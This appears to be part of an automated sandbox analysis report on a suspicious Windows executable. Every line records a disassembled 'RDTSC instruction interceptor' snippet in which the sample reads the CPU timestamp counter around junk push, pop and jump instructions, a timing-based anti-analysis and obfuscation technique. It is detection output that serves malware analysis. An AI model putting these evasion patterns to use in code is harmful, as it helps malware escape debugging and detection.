                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67E48B second address: 67E51D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06687C5EF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F06687C5EF2h 0x0000000e pushad 0x0000000f jmp 00007F06687C5EF8h 0x00000014 jl 00007F06687C5EE6h 0x0000001a jnc 00007F06687C5EE6h 0x00000020 push edx 0x00000021 pop edx 0x00000022 popad 0x00000023 jmp 00007F06687C5EF6h 0x00000028 popad 0x00000029 pushad 0x0000002a push eax 0x0000002b jmp 00007F06687C5EEFh 0x00000030 pop eax 0x00000031 jmp 00007F06687C5EEBh 0x00000036 push eax 0x00000037 push edx 0x00000038 js 00007F06687C5EE6h 0x0000003e jno 00007F06687C5EE6h 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67E942 second address: 67E968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0668FAD209h 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67E968 second address: 67E9B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F06687C5EFBh 0x0000000c jnl 00007F06687C5F0Ah 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67EF8C second address: 67EF9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD1FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67EF9A second address: 67EFA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67EFA0 second address: 67EFA6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67EFA6 second address: 67EFC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007F06687C5EF5h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67EFC5 second address: 67EFC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67F49C second address: 67F4CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06687C5EF6h 0x00000009 pushad 0x0000000a jmp 00007F06687C5EEDh 0x0000000f jg 00007F06687C5EE6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67F4CC second address: 67F4E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F0668FAD1F6h 0x00000010 jmp 00007F0668FAD1FCh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67F4E8 second address: 67F50A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06687C5EECh 0x00000007 jo 00007F06687C5EE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnp 00007F06687C5EECh 0x00000015 jng 00007F06687C5EE6h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67F50A second address: 67F50F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67F78D second address: 67F7A2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F06687C5EEEh 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67FFCC second address: 67FFD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67FFD0 second address: 67FFEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F06687C5EF5h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67FFEE second address: 67FFF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67FFF2 second address: 680009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06687C5EEEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 684620 second address: 684650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F0668FAD206h 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop eax 0x00000010 popad 0x00000011 je 00007F0668FAD21Ah 0x00000017 jl 00007F0668FAD206h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 684910 second address: 68491A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F06687C5EE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 68491A second address: 684934 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD206h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 684934 second address: 68493B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 684CFF second address: 684D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6866F5 second address: 6866F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6866F9 second address: 686708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jo 00007F0668FAD1F6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 686708 second address: 686735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F06687C5EF1h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F06687C5EF4h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 686735 second address: 68673A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 694E58 second address: 694E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 694E5E second address: 694E62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 694E62 second address: 694E78 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F06687C5EEDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 692FDE second address: 692FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 692FE5 second address: 693007 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06687C5EECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F06687C5EF0h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 693007 second address: 693020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0668FAD203h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 693020 second address: 693024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6934CF second address: 6934D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6934D5 second address: 6934D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6937A2 second address: 6937BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0668FAD1FAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jng 00007F0668FAD1F6h 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 693A5B second address: 693A69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06687C5EEAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 693A69 second address: 693A6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 693A6D second address: 693A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 693A75 second address: 693A91 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0668FAD1F8h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0668FAD1FAh 0x0000000f jno 00007F0668FAD1F6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 694CE2 second address: 694D0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jno 00007F06687C5EF2h 0x0000000b popad 0x0000000c jl 00007F06687C5F06h 0x00000012 jnp 00007F06687C5EF2h 0x00000018 jng 00007F06687C5EE6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 694D0E second address: 694D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 694D16 second address: 694D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 692AF0 second address: 692AFE instructions: 0x00000000 rdtsc 0x00000002 js 00007F0668FAD1F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 692AFE second address: 692B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6A5EEC second address: 6A5F03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F0668FAD1FCh 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6A8D09 second address: 6A8D0F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6AD2FC second address: 6AD300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6ACEC9 second address: 6ACECD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6ACECD second address: 6ACED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6ACED3 second address: 6ACEDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6BA423 second address: 6BA431 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0668FAD1F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6BA431 second address: 6BA435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6BA435 second address: 6BA439 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6BA439 second address: 6BA45B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F06687C5EF9h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6C55ED second address: 6C5609 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD202h 0x00000007 js 00007F0668FAD1F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6C574E second address: 6C5766 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06687C5EEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d js 00007F06687C5EE6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6C5766 second address: 6C576A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6C576A second address: 6C57AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F06687C5EFDh 0x00000011 push eax 0x00000012 pop eax 0x00000013 jmp 00007F06687C5EF5h 0x00000018 jmp 00007F06687C5EF8h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0698 second address: 48D06B9 instructions: 0x00000000 rdtsc 0x00000002 mov si, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F06687C5EF4h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D06B9 second address: 48D06C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD1FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D06C8 second address: 48D06CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D06CE second address: 48D06D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D06D2 second address: 48D070E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F06687C5EF8h 0x00000014 or ecx, 2E8F06F8h 0x0000001a jmp 00007F06687C5EEBh 0x0000001f popfd 0x00000020 mov ch, 94h 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D070E second address: 48D0714 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0765 second address: 48D0775 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06687C5EECh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0775 second address: 48D0779 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0779 second address: 48D07B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a jmp 00007F06687C5EF7h 0x0000000f test esi, esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F06687C5EF5h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D07B3 second address: 48D005B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F06DB76B092h 0x0000000c xor eax, eax 0x0000000e jmp 00007F0668F8692Ah 0x00000013 pop esi 0x00000014 pop edi 0x00000015 pop ebx 0x00000016 leave 0x00000017 retn 0004h 0x0000001a nop 0x0000001b xor ebx, ebx 0x0000001d cmp eax, 00000000h 0x00000020 je 00007F0668FAD353h 0x00000026 call 00007F066D43A67Dh 0x0000002b mov edi, edi 0x0000002d pushad 0x0000002e jmp 00007F0668FAD1FBh 0x00000033 push eax 0x00000034 mov ax, dx 0x00000037 pop edi 0x00000038 popad 0x00000039 xchg eax, ebp 0x0000003a pushad 0x0000003b mov edi, 1C63DD6Eh 0x00000040 popad 0x00000041 push eax 0x00000042 jmp 00007F0668FAD204h 0x00000047 xchg eax, ebp 0x00000048 jmp 00007F0668FAD200h 0x0000004d mov ebp, esp 0x0000004f jmp 00007F0668FAD200h 0x00000054 xchg eax, ecx 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a popad 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D005B second address: 48D005F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D005F second address: 48D0065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0065 second address: 48D009C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 95E1h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F06687C5EF8h 0x00000011 push eax 0x00000012 push edx 0x00000013 call 00007F06687C5EF0h 0x00000018 pop ecx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D009C second address: 48D00BF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ecx 0x00000008 jmp 00007F0668FAD1FDh 0x0000000d mov dword ptr [ebp-04h], 55534552h 0x00000014 pushad 0x00000015 mov ebx, ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 mov cl, AEh 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0105 second address: 48D0115 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06687C5EECh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0115 second address: 48D0119 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0C52 second address: 48D0CE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F06687C5EF1h 0x00000009 or cl, FFFFFFA6h 0x0000000c jmp 00007F06687C5EF1h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F06687C5EF0h 0x00000018 adc ecx, 6E1E9148h 0x0000001e jmp 00007F06687C5EEBh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 xchg eax, ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F06687C5EEBh 0x00000031 xor cl, FFFFFF8Eh 0x00000034 jmp 00007F06687C5EF9h 0x00000039 popfd 0x0000003a call 00007F06687C5EF0h 0x0000003f pop eax 0x00000040 popad 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0CE1 second address: 48D0CE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0CE7 second address: 48D0CEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0CEB second address: 48D0CFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0CFB second address: 48D0D16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06687C5EF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0D16 second address: 48D0D69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [770E459Ch], 05h 0x00000010 pushad 0x00000011 call 00007F0668FAD1FCh 0x00000016 jmp 00007F0668FAD202h 0x0000001b pop eax 0x0000001c mov esi, ebx 0x0000001e popad 0x0000001f je 00007F06DB75AE98h 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0D69 second address: 48D0D6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0D6D second address: 48D0D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0E57 second address: 48D0E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0E5B second address: 48D0E5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0E5F second address: 48D0E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0E65 second address: 48D0EB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0668FAD202h 0x00000009 jmp 00007F0668FAD205h 0x0000000e popfd 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 sub esi, esi 0x00000016 jmp 00007F0668FAD1FDh 0x0000001b mov dword ptr [ebp-1Ch], esi 0x0000001e pushad 0x0000001f mov si, ABC3h 0x00000023 push eax 0x00000024 push edx 0x00000025 mov al, 72h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E0C55 second address: 48E0C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov ebp, esp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F06687C5EF7h 0x0000000f rdtsc
